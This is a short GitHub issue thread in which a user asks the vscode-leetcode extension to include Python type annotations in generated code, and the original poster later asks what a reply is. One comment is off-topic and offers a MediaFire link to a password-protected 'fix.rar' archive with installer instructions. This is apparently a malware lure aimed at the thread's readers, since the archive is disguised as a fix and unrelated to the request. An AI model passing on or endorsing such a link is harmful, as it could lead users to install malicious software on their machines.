### ISSUE TITLE
Add type annotation to python function

### ISSUE THREAD

**Issue by shafayetejaman** [LeetCode-OpenSource/vscode-leetcode#973]
## 🚀 Feature Proposal

![image](https://github.com/user-attachments/assets/41ee9fb3-4602-4a99-b835-ceb8d0dd9c00)

I like to use type annotation in my python code for inline-seance hints and better readability.
However, the extension does not provide the type annotation even though the leetcode does.

![image](https://github.com/user-attachments/assets/5b46ba80-3b5f-42a9-b839-dd874d1e43cb)

## Motivation

It will save time and help write better code.

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by shafayetejaman** [comment]
what is it?
